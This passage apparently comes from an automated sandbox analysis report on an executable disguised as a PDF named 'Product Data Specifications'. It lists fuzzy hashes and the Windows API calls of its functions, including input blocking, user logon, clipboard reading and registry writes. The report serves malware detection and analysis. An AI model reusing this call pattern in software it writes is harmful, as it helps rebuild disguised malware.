                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Proc
                              • String ID:
                              • API String ID: 2346855178-0
                              • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                              • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                              APIs
                              • BlockInput.USER32(00000001), ref: 0045A38B
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: BlockInput
                              • String ID:
                              • API String ID: 3456056419-0
                              • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                              • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                              APIs
                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: LogonUser
                              • String ID:
                              • API String ID: 1244722697-0
                              • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                              • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              Strings
                              Similarity
                              • API ID:
                              • String ID: N@
                              • API String ID: 0-1509896676
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              APIs
                              • DeleteObject.GDI32(?), ref: 0045953B
                              • DeleteObject.GDI32(?), ref: 00459551
                              • DestroyWindow.USER32(?), ref: 00459563
                              • GetDesktopWindow.USER32 ref: 00459581
                              • GetWindowRect.USER32(00000000), ref: 00459588
                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                              • GetClientRect.USER32(00000000,?), ref: 004596F8
                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                              • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                              • GlobalLock.KERNEL32(00000000), ref: 0045978F
                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                              • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                              • CloseHandle.KERNEL32(00000000), ref: 004597AC
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                              • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                              • GlobalFree.KERNEL32(00000000), ref: 004597E2
                              • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                              • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                              • ShowWindow.USER32(?,00000004), ref: 00459865
                              • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                              • GetStockObject.GDI32(00000011), ref: 004598CD
                              • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                              • DeleteDC.GDI32(00000000), ref: 004598F8
                              • _wcslen.LIBCMT ref: 00459916
                              • _wcscpy.LIBCMT ref: 0045993A
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                              • GetDC.USER32(00000000), ref: 004599FC
                              • SelectObject.GDI32(00000000,?), ref: 00459A0C
                              • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                              • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                              • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                              Strings
                              Similarity
                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                              • String ID: $AutoIt v3$DISPLAY$static
                              • API String ID: 4040870279-2373415609
                              APIs
                              • GetSysColor.USER32(00000012), ref: 0044181E
                              • SetTextColor.GDI32(?,?), ref: 00441826
                              • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                              • GetSysColor.USER32(0000000F), ref: 00441849
                              • SetBkColor.GDI32(?,?), ref: 00441864
                              • SelectObject.GDI32(?,?), ref: 00441874
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                              • GetSysColor.USER32(00000010), ref: 004418B2
                              • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                              • FrameRect.USER32(?,?,00000000), ref: 004418CA
                              • DeleteObject.GDI32(?), ref: 004418D5
                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                              • FillRect.USER32(?,?,?), ref: 00441970
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              Similarity
                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                              • String ID:
                              • API String ID: 69173610-0
                              APIs
                              • DestroyWindow.USER32(?), ref: 004590F2
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                              • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                              • GetClientRect.USER32(00000000,?), ref: 0045924E
                              • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                              • GetStockObject.GDI32(00000011), ref: 004592AC
                              • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                              • DeleteDC.GDI32(00000000), ref: 004592D6
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                              • GetStockObject.GDI32(00000011), ref: 004593D3
                              • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                              Strings
                              Similarity
                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                              • API String ID: 2910397461-517079104
                              APIs
                              Strings
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                              • API String ID: 1038674560-3360698832
                              APIs
                              • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                              • SetCursor.USER32(00000000), ref: 0043075B
                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                              • SetCursor.USER32(00000000), ref: 00430773
                              • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                              • SetCursor.USER32(00000000), ref: 0043078B
                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                              • SetCursor.USER32(00000000), ref: 004307A3
                              • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                              • SetCursor.USER32(00000000), ref: 004307BB
                              • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                              • SetCursor.USER32(00000000), ref: 004307D3
                              • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                              • SetCursor.USER32(00000000), ref: 004307EB
                              • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                              • SetCursor.USER32(00000000), ref: 00430803
                              • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                              • SetCursor.USER32(00000000), ref: 0043081B
                              • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                              • SetCursor.USER32(00000000), ref: 00430833
                              • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                              • SetCursor.USER32(00000000), ref: 0043084B
                              • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                              • SetCursor.USER32(00000000), ref: 00430863
                              • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                              • SetCursor.USER32(00000000), ref: 0043087B
                              • SetCursor.USER32(00000000), ref: 00430887
                              • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                              • SetCursor.USER32(00000000), ref: 0043089F
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Cursor$Load
                              • String ID:
                              • API String ID: 1675784387-0
                              • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                              • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                              APIs
                              • GetSysColor.USER32(0000000E), ref: 00430913
                              • SetTextColor.GDI32(?,00000000), ref: 0043091B
                              • GetSysColor.USER32(00000012), ref: 00430933
                              • SetTextColor.GDI32(?,?), ref: 0043093B
                              • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                              • GetSysColor.USER32(0000000F), ref: 00430959
                              • CreateSolidBrush.GDI32(?), ref: 00430962
                              • GetSysColor.USER32(00000011), ref: 00430979
                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                              • SelectObject.GDI32(?,00000000), ref: 0043099C
                              • SetBkColor.GDI32(?,?), ref: 004309A6
                              • SelectObject.GDI32(?,?), ref: 004309B4
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                              • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                              • DrawFocusRect.USER32(?,?), ref: 00430A91
                              • GetSysColor.USER32(00000011), ref: 00430A9F
                              • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                              • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                              • SelectObject.GDI32(?,?), ref: 00430AD0
                              • DeleteObject.GDI32(00000105), ref: 00430ADC
                              • SelectObject.GDI32(?,?), ref: 00430AE3
                              • DeleteObject.GDI32(?), ref: 00430AE9
                              • SetTextColor.GDI32(?,?), ref: 00430AF0
                              • SetBkColor.GDI32(?,?), ref: 00430AFB
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                              • String ID:
                              • API String ID: 1582027408-0
                              • Opcode ID: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                              • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                              • Opcode Fuzzy Hash: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                              • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                              APIs
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                              • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CloseConnectCreateRegistry
                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                              • API String ID: 3217815495-966354055
                              • Opcode ID: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                              • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                              • Opcode Fuzzy Hash: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                              • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                              APIs
                              • GetCursorPos.USER32(?), ref: 004566AE
                              • GetDesktopWindow.USER32 ref: 004566C3
                              • GetWindowRect.USER32(00000000), ref: 004566CA
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                              • DestroyWindow.USER32(?), ref: 00456746
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                              • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                              • IsWindowVisible.USER32(?), ref: 0045682C
                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                              • GetWindowRect.USER32(?,?), ref: 00456873
                              • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                              • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                              • CopyRect.USER32(?,?), ref: 004568BE
                              • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                              • String ID: ($,$tooltips_class32
                              • API String ID: 225202481-3320066284
                              • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                              • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                              • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetWindowRect.USER32(?,?), ref: 00471CF7
                              • GetClientRect.USER32(?,?), ref: 00471D05
                              • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                              • GetSystemMetrics.USER32(00000008), ref: 00471D20
                              • GetSystemMetrics.USER32(00000004), ref: 00471D42
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                              • GetSystemMetrics.USER32(00000007), ref: 00471D79
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                              • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                              • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                              • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                              • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                              • GetClientRect.USER32(?,?), ref: 00471E8A
                              • GetStockObject.GDI32(00000011), ref: 00471EA6
                              • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                              • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                              • String ID: @$AutoIt v3 GUI
                              • API String ID: 867697134-3359773793
